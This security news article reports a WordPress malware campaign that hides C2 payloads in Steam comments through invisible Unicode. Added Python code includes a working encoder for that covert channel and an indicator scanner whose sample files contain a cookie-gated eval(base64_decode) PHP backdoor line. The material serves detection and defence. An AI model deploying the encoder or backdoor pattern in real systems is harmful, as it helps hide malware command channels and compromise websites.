PROBABLYPWNED
Malware | June 8, 2026 | 4 min read

WordPress Malware Hides C2 Payloads in Steam Profile Comments

GoDaddy researchers uncover campaign infecting 2,000 WordPress sites with malware that extracts commands from invisible Unicode characters in Steam Community comments.

James Rivera

Nearly 2,000 WordPress websites have been infected with malware that conceals its command-and-control infrastructure inside Steam Community profile comments, using invisible Unicode characters to hide malicious payloads in plain sight.

GoDaddy security engineers discovered the campaign while tracking WordPress infections since July 2025. The technique exploits the difficulty of detecting hidden characters within user-generated content on legitimate platforms—in this case, Valve's Steam gaming community.

How the Attack Works

The infection operates in three stages. In the first, malicious code planted on a WordPress site runs on page load and fetches specific Steam profile URLs. In the second, the malware retrieves the comments posted on those profiles and extracts text that looks innocuous to a human reader but carries hidden instructions. The third stage, a PHP backdoor, is described below.

The payloads are encoded using six invisible Unicode characters:

  • Zero-width non-joiner (U+200C)
  • Zero-width joiner (U+200D)
  • Function application (U+2061)
  • Invisible times (U+2062)
  • Invisible separator (U+2063)
  • Invisible plus (U+2064)

As GoDaddy researchers explained, this encoding embeds binary data within normal-looking text. A Steam comment might read "great profile!" while actually containing encoded URLs for malicious JavaScript libraries. The visible text serves as camouflage while the invisible characters carry the actual instructions.
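To make the hiding concrete, here is an added example (mine, not GoDaddy's code and not the malware's): a hypothetical encoder that spreads payload bytes through a cover comment using those six code points, and the decoder and detector a defender would write against it. The two-bits-per-character framing scheme, the cover text and the URL are assumptions; the write-up does not publish the campaign's actual mapping, only the six characters it uses.

```python
import re
import unicodedata
from typing import List, Optional, Tuple

# The six invisible code points named in the GoDaddy write-up.
ZWNJ, ZWJ, FUNC_APP, INV_TIMES, INV_SEP, INV_PLUS = (
    "\u200c", "\u200d", "\u2061", "\u2062", "\u2063", "\u2064")
INVISIBLE = ZWNJ + ZWJ + FUNC_APP + INV_TIMES + INV_SEP + INV_PLUS
INVISIBLE_RE = re.compile("[" + re.escape(INVISIBLE) + "]")

# ASSUMED scheme (the campaign's real mapping is not documented here):
# four code points carry two bits each, U+2063 opens a hidden frame and
# U+2064 closes it, so a decoder can find the payload among stray joiners.
DIGITS = ZWNJ + ZWJ + FUNC_APP + INV_TIMES      # values 0, 1, 2, 3
FRAME_START, FRAME_END = INV_SEP, INV_PLUS


def encode_hidden(payload: bytes, cover: str) -> str:
    """Return `cover` with `payload` spread through it as invisible characters."""
    symbols = [FRAME_START]
    for byte in payload:
        for shift in (6, 4, 2, 0):                # most significant pair first
            symbols.append(DIGITS[(byte >> shift) & 3])
    symbols.append(FRAME_END)
    # Interleave evenly so no single position carries a suspicious run.
    per_slot = -(-len(symbols) // max(len(cover), 1))   # ceiling division
    out, pos = [], 0
    for ch in cover:
        out.append(ch + "".join(symbols[pos:pos + per_slot]))
        pos += per_slot
    out.append("".join(symbols[pos:]))
    return "".join(out)


def decode_hidden(text: str) -> Optional[bytes]:
    """Recover the framed payload, or None if there is no well-formed frame."""
    stream = "".join(INVISIBLE_RE.findall(text))
    start = stream.find(FRAME_START)
    end = stream.find(FRAME_END, start + 1) if start >= 0 else -1
    if start < 0 or end < 0:
        return None
    body = stream[start + 1:end]
    if len(body) % 4 or any(c not in DIGITS for c in body):
        return None
    out = bytearray()
    for i in range(0, len(body), 4):
        value = 0
        for c in body[i:i + 4]:
            value = (value << 2) | DIGITS.index(c)
        out.append(value)
    return bytes(out)


def visible_text(text: str) -> str:
    """What a human reader, or a naive keyword match, actually sees."""
    return INVISIBLE_RE.sub("", text)


def find_invisible(text: str) -> List[Tuple[int, str]]:
    """Detection side: offset and Unicode name of every hidden code point."""
    return [(m.start(), unicodedata.name(m.group()))
            for m in INVISIBLE_RE.finditer(text)]


if __name__ == "__main__":
    # Constructed comment; the URL is a placeholder, not an indicator from the campaign.
    comment = encode_hidden(b"https://cdn.example.invalid/lib.js", "great profile!")
    print(repr(visible_text(comment)))
    print(len(comment), "code points,", len(find_invisible(comment)), "of them invisible")
    print(decode_hidden(comment))
```

The detector is the useful half: any service that stores user text verbatim preserves the channel, while one that strips or normalizes these code points before saving destroys it. Note also that counting invisible characters is a cheap heuristic; a handful of joiners is normal in scripts that need them, so the check belongs on the ratio of hidden to visible characters, not on their mere presence.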

Backdoor Capabilities

The final stage deploys a PHP backdoor that accepts specially crafted POST requests. Attackers authenticate using a specific cookie value ("tEcaKKXEsb"), then pass base64-encoded PHP code for execution. This gives operators full control over infected sites—they can modify content, steal data, or pivot to attack site visitors.

The technique bears similarity to other WordPress campaigns we've covered, but the Steam-based C2 channel represents a novel evasion method. By hosting instructions on a legitimate platform, attackers avoid the usual red flags that come with dedicated malicious infrastructure.

Detection Indicators

Security teams monitoring WordPress environments should watch for:

  1. Outbound connections to Steam Community URLs from web servers
  2. External JavaScript injections referencing unfamiliar domains
  3. References to hello-mywordl[.]info in site code
  4. Suspicious cache entries combined with disabled SSL verification
  5. Invisible Unicode characters in any imported or injected code
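As an added illustration (mine, not GoDaddy's tooling), a line-oriented scanner that turns the indicators above into regular expressions and runs them over constructed sample files. Only the hello-mywordl[.]info domain, the cookie value and the six invisible code points are taken from the write-up; the Steam Community URL pattern, the two SSL-verification idioms (PHP curl and the WordPress HTTP API) and the eval/base64_decode pattern are assumptions about what such code typically looks like.

```python
import os
import re
from typing import Dict, List, Tuple

# Only the domain, the cookie value and the invisible code points come from
# the write-up; the other patterns are my assumptions about typical idioms.
INDICATORS = {
    "steam_profile_fetch": re.compile(r"steamcommunity\.com/(?:id|profiles)/", re.I),
    "c2_domain":           re.compile(r"hello-mywordl\.info", re.I),
    "backdoor_cookie":     re.compile(r"tEcaKKXEsb"),
    "ssl_verify_disabled": re.compile(
        r"CURLOPT_SSL_VERIFY(?:PEER|HOST)\s*,\s*(?:false|0)\b"
        r"|['\"]sslverify['\"]\s*=>\s*false", re.I),
    "eval_base64":         re.compile(r"eval\s*\(\s*base64_decode\s*\("),
    "invisible_unicode":   re.compile("[\u200c\u200d\u2061-\u2064]"),
}

Hit = Tuple[str, int, str]   # (indicator name, line number, trimmed line)


def scan_text(text: str) -> List[Hit]:
    """Run every indicator over each line; one hit per (indicator, line)."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for name, pattern in INDICATORS.items():
            if pattern.search(line):
                hits.append((name, lineno, line.strip()[:80]))
    return hits


def scan_files(files: Dict[str, str]) -> Dict[str, List[Hit]]:
    """Return only the files that produced at least one hit, keyed by path."""
    report = {}
    for path, text in files.items():
        hits = scan_text(text)
        if hits:
            report[path] = hits
    return report


def scan_directory(root: str, exts=(".php", ".js", ".html")) -> Dict[str, List[Hit]]:
    """Same scan over a real site tree; decode leniently so odd bytes cannot abort it."""
    files = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, "rb") as fh:
                    files[path] = fh.read().decode("utf-8", errors="replace")
    return scan_files(files)


# Constructed sample tree (plain strings, not real files or recovered malware).
SAMPLE_FILES = {
    "wp-content/plugins/good-plugin/good-plugin.php":
        "<?php\n"
        "// ordinary plugin code: nothing here should trip an indicator\n"
        "add_action('init', function () { return true; });\n",
    "wp-content/themes/theme/functions.php":
        "<?php\n"
        "$r = wp_remote_get('https://steamcommunity.com/profiles/PLACEHOLDER/', "
        "['sslverify' => false]);\n"
        "set_transient('cfg_cache', $r['body'], 3600);\n",
    "wp-content/uploads/2025/07/dropped.php":
        "<?php\n"
        "if ($_COOKIE['a'] === 'tEcaKKXEsb') { eval(base64_decode($_POST['c'])); }\n",
    "wp-content/uploads/loader.js":
        "var s = 'great\u200c profile\u2063!'; // https://hello-mywordl.info/lib.js\n",
}


if __name__ == "__main__":
    for path, hits in scan_files(SAMPLE_FILES).items():
        for name, lineno, line in hits:
            print(f"{path}:{lineno}: {name}: {line}")
```

Run scan_directory against the document root of a real site. A PHP file under wp-content/uploads is suspicious on its own regardless of content, so treat any hit there as high priority; a hit in a theme's functions.php needs a diff against the vendor's copy before you call it malicious.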

The initial infection vector remains unclear, but researchers assess it likely involves stolen administrative credentials, compromised FTP/SFTP access, vulnerable plugins or themes, or upstream supply chain compromises.

WordPress Security Recommendations

Site administrators should audit their installations for signs of infection. Beyond checking for the specific indicators above:

  1. Review all installed plugins and themes for unauthorized modifications
  2. Check user accounts for any unexpected administrators
  3. Examine recently modified files using find commands with modification time filters
  4. Scan JavaScript files for obfuscated or minified code that doesn't match original sources
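For steps 3 and 4, an added example (mine, not from the article or GoDaddy) that does the modification-time filter in Python and pairs it with a hash baseline, so an attacker who resets timestamps with touch is still caught as a content change. The directory tree, file names and contents are a constructed fixture written to a temporary directory.

```python
import hashlib
import os
import tempfile
import time
from typing import Dict, List, Optional

WATCH_EXTS = (".php", ".js")

# Relative paths of the constructed fixture (not a real site).
FIX_VERSION = os.path.join("wp-includes", "version.php")
FIX_FUNCTIONS = os.path.join("wp-content", "themes", "theme", "functions.php")
FIX_DROPPED = os.path.join("wp-content", "uploads", "2025", "07", "dropped.php")


def sha256_of(path: str) -> str:
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_manifest(root: str) -> Dict[str, str]:
    """relative path -> sha256 for every watched file. Take this right after a
    clean install or update, and store it where the web server cannot write."""
    manifest = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.endswith(WATCH_EXTS):
                full = os.path.join(dirpath, name)
                manifest[os.path.relpath(full, root)] = sha256_of(full)
    return manifest


def audit(root: str, manifest: Dict[str, str], days: int = 30,
          now: Optional[float] = None) -> Dict[str, List[str]]:
    r"""Python equivalent of
         find ROOT -type f \( -name '*.php' -o -name '*.js' \) -mtime -DAYS
    plus a hash comparison against the manifest, so a file whose mtime was
    reset still shows up as modified."""
    now = time.time() if now is None else now
    cutoff = now - days * 86400
    found = {"recent": [], "modified": [], "new": [], "missing": []}
    seen = set()
    for dirpath, _, names in os.walk(root):
        for name in names:
            if not name.endswith(WATCH_EXTS):
                continue
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root)
            seen.add(rel)
            if os.stat(full).st_mtime >= cutoff:
                found["recent"].append(rel)
            if rel not in manifest:
                found["new"].append(rel)
            elif manifest[rel] != sha256_of(full):
                found["modified"].append(rel)
    found["missing"] = list(set(manifest) - seen)
    return {key: sorted(paths) for key, paths in found.items()}


def write_file(root: str, rel: str, text: str, mtime: Optional[float] = None) -> None:
    """Fixture helper: write a file and optionally back-date its mtime."""
    full = os.path.join(root, rel)
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "w") as fh:
        fh.write(text)
    if mtime is not None:
        os.utime(full, (mtime, mtime))


def run_demo() -> Dict[str, List[str]]:
    """Build the fixture, take a baseline, then simulate an intrusion and audit."""
    root = tempfile.mkdtemp(prefix="wp-audit-")
    old = time.time() - 90 * 86400          # untouched for 90 days
    write_file(root, FIX_VERSION, "<?php $wp_version = 'x';\n", old)
    write_file(root, FIX_FUNCTIONS, "<?php // theme functions\n", old)
    manifest = build_manifest(root)
    # Post-baseline changes: one edited theme file, one file dropped in uploads.
    write_file(root, FIX_FUNCTIONS, "<?php // theme functions\n// injected line\n")
    write_file(root, FIX_DROPPED, "<?php // appeared after the baseline\n")
    return audit(root, manifest, days=30)


if __name__ == "__main__":
    for key, paths in run_demo().items():
        print(f"{key}: {paths or '-'}")
```

The manifest only has value if it predates the compromise and lives off the server; a baseline taken from an already-infected site just ratifies the backdoor. For the JavaScript check in step 4, compare hashes against the plugin or theme author's release archive rather than against a copy from the same host.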

Organizations running multiple WordPress sites should consider centralized security monitoring. The campaign's scale suggests attackers are operating efficiently across thousands of targets.

For those unfamiliar with WordPress security fundamentals, our malware defense guide covers the basics of how these infections spread and persist.

Why This Matters

The Steam-based C2 technique highlights a growing trend: attackers embedding malicious infrastructure within legitimate services to evade detection. Security tools that rely on domain reputation or blocklists won't flag traffic to Valve's own Steam domains. The malicious payload only becomes visible when you examine the specific content being retrieved, and even then the Unicode encoding makes it difficult to spot.

This represents a broader challenge for web security. User-generated content platforms provide enormous attack surface for hiding malicious payloads. Attackers have previously used Telegram, Discord, and various paste sites for similar purposes. Steam profiles are just the latest example.

The invisible Unicode technique could be replicated across many platforms. Any service that allows user comments and doesn't strip invisible characters is a potential C2 channel. Defenders should consider this capability when assessing traffic to legitimate platforms—the domain being trusted doesn't mean the content is safe.

GoDaddy continues to track the campaign and has reported the malicious Steam profiles to Valve. Site owners who discover infections should assume credentials have been compromised and rotate all authentication material after cleaning the malware.
